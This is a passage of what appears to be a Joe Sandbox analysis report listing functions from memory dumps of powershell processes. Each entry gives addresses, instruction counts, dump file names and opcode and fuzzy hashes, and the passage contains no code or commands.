                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77ba16f6431bdf790cc2d1556bf46bf5ecc68d47c499839e4799bfc213ee61fd
                                  • Instruction ID: 5a495b295d127ff94d201ab025d5c362328c01ce825ce8a86697be33ad6d9a2f
                                  • Opcode Fuzzy Hash: 77ba16f6431bdf790cc2d1556bf46bf5ecc68d47c499839e4799bfc213ee61fd
                                  • Instruction Fuzzy Hash: 2601677121CB0C4FD784EF0CE491AA5B7E0FB95364F10056EE58AC3691D636E881CB45

                                  Non-executed Functions

                                  Function 00007FFD345A16C9 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.3388274798.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,P_^$-P_^
                                  • API String ID: 0-2410056697
                                  • Opcode ID: c6630bd85317b3183ffa15da17d0ebacc69a41c8145cad7ac4f40c70d5d67ec6
                                  • Instruction ID: ef2d7985d862c2ee394258cdb205a821651dd29588de4652a06c5c8fbb2a9220
                                  • Opcode Fuzzy Hash: c6630bd85317b3183ffa15da17d0ebacc69a41c8145cad7ac4f40c70d5d67ec6
                                  • Instruction Fuzzy Hash: 2E616357E0E7D61FE663963828F50D63FD5DF13264B0A10B7D694CE0D3ED1C28066252
                                  Function 00007FFD345A2AD3 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.3388274798.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5687ba9968d171ea068e740ede1fd95dea2827062a5dce170d827258ddc9674f
                                  • Instruction ID: a24f0d40edfac7786b26b467c7a2645134b601640603baaab3b8ff75e27572be
                                  • Opcode Fuzzy Hash: 5687ba9968d171ea068e740ede1fd95dea2827062a5dce170d827258ddc9674f
                                  • Instruction Fuzzy Hash: 8CD0A9AF70D0218AF4137A9DBC0A8CA230CDFE23327840033F288CA283CA4D200B80B0

                                  Executed Functions

                                  Function 00007FFD34680B09 Relevance: 3.5, Strings: 2, Instructions: 985COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (z4$@z4
                                  • API String ID: 0-3987000616
                                  • Opcode ID: 4a02bc0bb2b9a44efef1d27360fe8f3383cd37f616f08876e10351d073481ec2
                                  • Instruction ID: dd348f406a4c5d06c332b37da0e16f9a5a1d7135528d07560ac76f51ce2fa310
                                  • Opcode Fuzzy Hash: 4a02bc0bb2b9a44efef1d27360fe8f3383cd37f616f08876e10351d073481ec2
                                  • Instruction Fuzzy Hash: E6523432B0EBC94FE7A69B2848A55A17BE1EF57310B0905FFD089C71A3DE19AC46C341
                                  Function 00007FFD345B7895 Relevance: .3, Instructions: 318COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df7f0140fe296fda2be790fc2493c0b2099497625ec45ab3a1af2ab8ec18666b
                                  • Instruction ID: cc1bbb43bc1c9394f6020f74ac626ad3d75d32ca8dd5baf808e4bcadea7c5998
                                  • Opcode Fuzzy Hash: df7f0140fe296fda2be790fc2493c0b2099497625ec45ab3a1af2ab8ec18666b
                                  • Instruction Fuzzy Hash: 8DA12131F18A4D4FE759EB2884A66B97392EF86304F5041BAE50EC73D3DD69AC018780
                                  Function 00007FFD34683DA9 Relevance: .3, Instructions: 276COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20454939fdab816c270256385dec908b282b86c71cce896b2a9fb7dd772555ec
                                  • Instruction ID: c7f4d7850ac0b599c6e47236ca4303ca91c6aabc594ec4fc3f80ac75119532d7
                                  • Opcode Fuzzy Hash: 20454939fdab816c270256385dec908b282b86c71cce896b2a9fb7dd772555ec
                                  • Instruction Fuzzy Hash: 3D714932B1DA594FE7E89E2C58A61B977D1EFC6314B0402BFD54EC7193DD1AAC428381
                                  Function 00007FFD34682B9E Relevance: .2, Instructions: 223COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be924c2bbf6a22745d0bc28d8212770392a4301430f60a2bd723dcd1129d4e25
                                  • Instruction ID: 5004467d07abaec5c11d767c8b38fe990450d0a8df209cadc11125cc236a6c4e
                                  • Opcode Fuzzy Hash: be924c2bbf6a22745d0bc28d8212770392a4301430f60a2bd723dcd1129d4e25
                                  • Instruction Fuzzy Hash: 7951E762B0EE960FEBE99E6C94B52F5A7C2EF96310B4805BED15FC31D3ED1CA8015241
                                  Function 00007FFD3468259E Relevance: .2, Instructions: 192COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c09ac29b1e93398e6fc628841a5c282c866810abd367aae70a85b3bc8b013fa
                                  • Instruction ID: 83b4a2493857e621a55482b86977d0eebe4337c94687b113807daf77cbadcb85
                                  • Opcode Fuzzy Hash: 7c09ac29b1e93398e6fc628841a5c282c866810abd367aae70a85b3bc8b013fa
                                  • Instruction Fuzzy Hash: F351F622B1EEAA0BEBE99A6C54B52F563C2EF46710B58017ED54FC31D3DD0CAC419381
                                  Function 00007FFD345B825C Relevance: .2, Instructions: 160COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd341d5d36b620d46932430e947ec708165775d2c5223961cbde35bebca31043
                                  • Instruction ID: e92c1d2b6cc771342323a4974afe0d246a535f6f4b6ed8535ff5562e327873d0
                                  • Opcode Fuzzy Hash: fd341d5d36b620d46932430e947ec708165775d2c5223961cbde35bebca31043
                                  • Instruction Fuzzy Hash: C041A521F29E4A4BEA99F76850762BD72C2EFA9304F9040B9E90ED73D3DD68BC454341
                                  Function 00007FFD34682BEA Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 302d8c86f3515db2a230010eb4da67cb5144f7e512568cf35818428793eb38db
                                  • Instruction ID: b90aac4881eaf633596fdc03c5ce516dfa4034bf2633def39c668a12e1278f81
                                  • Opcode Fuzzy Hash: 302d8c86f3515db2a230010eb4da67cb5144f7e512568cf35818428793eb38db
                                  • Instruction Fuzzy Hash: E141D496F0E9970BF7E99A1C84F52F457C2EFA6250B5801BAD65FC31D3DC0DA8416241
                                  Function 00007FFD345B79FD Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f62c10b53ae93712099c041d3231838c8bdc01dac92f845ad37581cabe9a45f3
                                  • Instruction ID: 31be55af04ae920254e22d3b2aabfb50ef806fb0ff50696fff9f622a30ba1a2b
                                  • Opcode Fuzzy Hash: f62c10b53ae93712099c041d3231838c8bdc01dac92f845ad37581cabe9a45f3
                                  • Instruction Fuzzy Hash: 14419331F1C6098BE759EB68C0A56B97392EB8A315F20417DE51ED73D2CE79AC428740
                                  Function 00007FFD346825EA Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13558e7a33da784e23c6fcf7d5fe85e7dccf1bbea2d3f5bf246cf297826e17c1
                                  • Instruction ID: a528814b9b57d58994f11afd3fd529bd99305615184f93555f717f2d9b8963c9
                                  • Opcode Fuzzy Hash: 13558e7a33da784e23c6fcf7d5fe85e7dccf1bbea2d3f5bf246cf297826e17c1
                                  • Instruction Fuzzy Hash: A931D022F1E9960BFBE9AA6848F52F853C1EF46310B58017ED65FD31D3DC0DAC816241
                                  Function 00007FFD345B7B3D Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68b7901aef6b9ddeba7494682ae434c96241f50ea2c1a49d46594a449f6859f3
                                  • Instruction ID: 5a2e0ad4c464d49cbadeb2a54e033bb7b6de4a000b844fe0ab0cb2392544aa60
                                  • Opcode Fuzzy Hash: 68b7901aef6b9ddeba7494682ae434c96241f50ea2c1a49d46594a449f6859f3
                                  • Instruction Fuzzy Hash: 26218071B186295FE749DA68D8E22B9B3E6FF86708F504039D24AE32C1DE7978128744
                                  Function 00007FFD345B80FB Relevance: .1, Instructions: 77COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8bcee0dcca33ec7848ad282ce28b911823a622e99621ee99bdc01cd7a18431ab
                                  • Instruction ID: 4d2d079682ef727291b18dd51a559f6e4135deb56efe282af8bd0ded00c0d59f
                                  • Opcode Fuzzy Hash: 8bcee0dcca33ec7848ad282ce28b911823a622e99621ee99bdc01cd7a18431ab
                                  • Instruction Fuzzy Hash: 56210E31B18A0D8FEB94EB78C46A67976E2EF99305F5000B9E50ED73A2DD79E841C701
                                  Function 00007FFD345B7AE5 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50c6737cbd1fdd5dd0f29f12211128f5d97dd171fe3258cabb06e88f8ae8a5ea
                                  • Instruction ID: 8cff9f6d4be387247024b99e550d7085f751dabdd9f775e7a61e473c9e97632b
                                  • Opcode Fuzzy Hash: 50c6737cbd1fdd5dd0f29f12211128f5d97dd171fe3258cabb06e88f8ae8a5ea
                                  • Instruction Fuzzy Hash: 7F219331F1C5098BE719EB68C4A16B873A3EB89315F60417DE40ED73D2DE696C42CB40
                                  Function 00007FFD345B7CDD Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32974cec625111185e4d989bb4550f5f374ff9fbbe0a0c2a226f9b6b3b92e257
                                  • Instruction ID: 3f9006bf6cece5a68a32506668f4972743cb02888e46eb24a493f50e3ce9a984
                                  • Opcode Fuzzy Hash: 32974cec625111185e4d989bb4550f5f374ff9fbbe0a0c2a226f9b6b3b92e257
                                  • Instruction Fuzzy Hash: 41117920F289094FF789E76884653B872D3EB8A305F104179E90ED73D6CEA92C419380
                                  Function 00007FFD345B7ABC Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 315233fd8b4b1538cef3c7b4c7d1b9844bd7bc0ea220d729d73cc4b49782f23d
                                  • Instruction ID: de7d209c0c5ed16612ac9665fd7d2f8a270b12bc519775510919c7b2f9422aa9
                                  • Opcode Fuzzy Hash: 315233fd8b4b1538cef3c7b4c7d1b9844bd7bc0ea220d729d73cc4b49782f23d
                                  • Instruction Fuzzy Hash: 5201F531F6C9060BE719A77C84652B93297EB8A716F20413DF50ED33D7DD6DAC828680
                                  Function 00007FFD345B5725 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                  • Instruction ID: e725eb9b051816a4cb46df1ce5a4154886244c262dcccabe43daed55f98bf408
                                  • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                  • Instruction Fuzzy Hash: CE01677121CB0C8FD788EF0CE455AA6B7E0FB95364F10056DE58AC3651DA36E882CB45
                                  Function 00007FFD345B91F2 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 923e4bfc76a7563b53a53327a6c674b2df40e896403d03f591021803c20f9d5f
                                  • Instruction ID: ed450ebf80a0b73f0545459919f76e675645a631982507c698a01ccc39c1b4b2
                                  • Opcode Fuzzy Hash: 923e4bfc76a7563b53a53327a6c674b2df40e896403d03f591021803c20f9d5f
                                  • Instruction Fuzzy Hash: 4DF0AF21F188194BE218F62894622BA72C3EBDA314F214279F56AC33E7DD686C429680
                                  Function 00007FFD345B83F1 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c268df331be56a453615783c47ce7c76e411f491d4cb24623899b1b3db80f8a
                                  • Instruction ID: ba72111ba21cbcfa7c9942fcf1a04393bf3b6d8269b1d50033cb28e6f71d0501
                                  • Opcode Fuzzy Hash: 8c268df331be56a453615783c47ce7c76e411f491d4cb24623899b1b3db80f8a
                                  • Instruction Fuzzy Hash: 1BF05430B28A094FE305B66C542227532D2DB4A705F10007DF90DC7393DD6A6C818282
                                  Function 00007FFD345B8470 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4552a075b95cff4d2c99ed8fb375725eb06b81e6411b58b7d5abce577bb24cb2
                                  • Instruction ID: 15f497a3c2f831feda2b645fec48327c0a63592cd8d59c1d8f763cecdbd2fab7
                                  • Opcode Fuzzy Hash: 4552a075b95cff4d2c99ed8fb375725eb06b81e6411b58b7d5abce577bb24cb2
                                  • Instruction Fuzzy Hash: DEF08C20B289490FE248B668986537932D2DB8A306F60013CFA1FC73D3DDA96C028240
                                  Function 00007FFD345B91BD Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a361e8579e3fd3546c5a0db944ba7eb7b2679f1357834cb7679600bed709aedc
                                  • Instruction ID: 608c8e7febd355b9d4544f176d08a5159e8daeccbe6833be4fb0de6660209fe7
                                  • Opcode Fuzzy Hash: a361e8579e3fd3546c5a0db944ba7eb7b2679f1357834cb7679600bed709aedc
                                  • Instruction Fuzzy Hash: 88F0A031F088094FE355F22890AA2F93283DBDA315F204179E40EC33D7DDACAC525680
                                  Function 00007FFD345B7D4E Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a95f34b3cc313060a96479e2db4c8c1e6816f461c2a0475d4965908c117ea93
                                  • Instruction ID: 22de026043215ad271137333fe08d7ce853d7ff141e33ab71dec46f66e8eb672
                                  • Opcode Fuzzy Hash: 0a95f34b3cc313060a96479e2db4c8c1e6816f461c2a0475d4965908c117ea93
                                  • Instruction Fuzzy Hash: EDF03A20F286094FF39AE76884653B83696AF46305F100179E60DD73D6CEAD6C40D381
                                  Function 00007FFD34683655 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb13d121cdce6b9f6a4f38776fd630214e5ee72f1439746cb35b5047d558ba65
                                  • Instruction ID: 18eeed2a6108248167bef1760deaa65e69409440a7fb6803f5138516cd64367e
                                  • Opcode Fuzzy Hash: bb13d121cdce6b9f6a4f38776fd630214e5ee72f1439746cb35b5047d558ba65
                                  • Instruction Fuzzy Hash: 87E08663F4D9390AE7E1E65C24696F4A3C1EF9972178502B3DA0DD3296EC09AC9012C0
                                  Function 00007FFD345B81B5 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7553b5254708703bf6ccd10b3cbd07867f095ae271272914d24e656cf99cb99
                                  • Instruction ID: e63f32789e5b96b63ab47d76dae117747bfde80b7b8f9650a5c58f60d1e904ff
                                  • Opcode Fuzzy Hash: e7553b5254708703bf6ccd10b3cbd07867f095ae271272914d24e656cf99cb99
                                  • Instruction Fuzzy Hash: DEE06D30B28A084FF305E76C806136936D3EB8A705F200079E50DDB393DDAA6C82C350
                                  Function 00007FFD345B80DB Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 82516fcfec3a6ea8dfe0d8f1980ba125ab5a84d45cb2eda90b924498dc6b46d0
                                  • Instruction ID: 6aac6c40a43b61b5a201ffcd930a1f5e816c873fad93c481cf69d8b266b028ff
                                  • Opcode Fuzzy Hash: 82516fcfec3a6ea8dfe0d8f1980ba125ab5a84d45cb2eda90b924498dc6b46d0
                                  • Instruction Fuzzy Hash: FBE04F31F5D9098FDB19DA18D4907A873A2EB85311F2082BAD10DC729ADE789886DA84
                                  Function 00007FFD345B7CA8 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4455d9b2bfd220c477fd582a725554bc27bc12ffde9f69e206e85a9da026afe1
                                  • Instruction ID: 984907bef94489415a33020ea61a1ee61a8aeeac92e75f1c0f22dd9a1c312b3c
                                  • Opcode Fuzzy Hash: 4455d9b2bfd220c477fd582a725554bc27bc12ffde9f69e206e85a9da026afe1
                                  • Instruction Fuzzy Hash: E9D0A725F294480BE308E734802133531878B87325F104238F62FC33D1DD691C019211
                                  Function 00007FFD345B8451 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6d9db4e71611ec26993dd760ddd393e7e4c6a9ddf99162c1b4521f092c6b2ae
                                  • Instruction ID: 0bf3eea9f85f908a048b466bc3cacbf3750d276de0979268f59146b1ca264407
                                  • Opcode Fuzzy Hash: e6d9db4e71611ec26993dd760ddd393e7e4c6a9ddf99162c1b4521f092c6b2ae
                                  • Instruction Fuzzy Hash: DBC04C50F1C90A8AF2247568B9B727CB291EB5A302F105135F64DD32D3DC687C55554A

                                  Executed Functions

                                  Function 00007FFD345B9848 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f23d6c21127cc6c621321076b71053ebfc5b2ad9e4d387843b96b42956baa5dd
                                  • Instruction ID: 5639cd5d0f20408c95814d944fac57e7f7432fef884e92946fc5881ce71b065a
                                  • Opcode Fuzzy Hash: f23d6c21127cc6c621321076b71053ebfc5b2ad9e4d387843b96b42956baa5dd
                                  • Instruction Fuzzy Hash: 03413A71A1CE884FDB599B5C98466B97BE0FB99310F00812FE089C3252DB74B845CBC2
                                  Function 00007FFD3449EF00 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2973360571.00007FFD3449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3449D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd3449d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b846f155b00692535c19cafa7e635316b63d55c97f757f8ac6fcadb1d271475a
                                  • Instruction ID: 7a1ddeb53c6cd096266e0e4502316702d6d3a0ac9f74a026d384d0f8ffb70c62
                                  • Opcode Fuzzy Hash: b846f155b00692535c19cafa7e635316b63d55c97f757f8ac6fcadb1d271475a
                                  • Instruction Fuzzy Hash: 3041067140DBC45FE756CB2998959523FF0EF57320B1A01EFD088CB1E7DA29A846C7A2
                                  Function 00007FFD345BA2C1 Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff7a1dddbf8324c3e43dca2e9f6399c608df04be493bb223cf3bb78fff5c345c
                                  • Instruction ID: 8103eaf6b1ab61e28f04cde92db87d8a826eb2044bcc4e0d09a8e49df6850363
                                  • Opcode Fuzzy Hash: ff7a1dddbf8324c3e43dca2e9f6399c608df04be493bb223cf3bb78fff5c345c
                                  • Instruction Fuzzy Hash: AD31E53190D7884FDB59DF68884A7EA7FF0EB96321F0541ABD048C7163D738A846CB51
                                  Function 00007FFD3468681E Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44e60b6f90ec62e39789f12d11948b0c6bec9b58941a8c9040ea4b5e53b00071
                                  • Instruction ID: 59cde435aa5890ac44e3a600ed504a4aae6dfc3d0e22a354da4695de7e8d7680
                                  • Opcode Fuzzy Hash: 44e60b6f90ec62e39789f12d11948b0c6bec9b58941a8c9040ea4b5e53b00071
                                  • Instruction Fuzzy Hash: 5A110272B0D68C8FEBA1EF9890A41A87BD1EF4A310F0401BEC54DDB193CA28A845C320
                                  Function 00007FFD345B33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
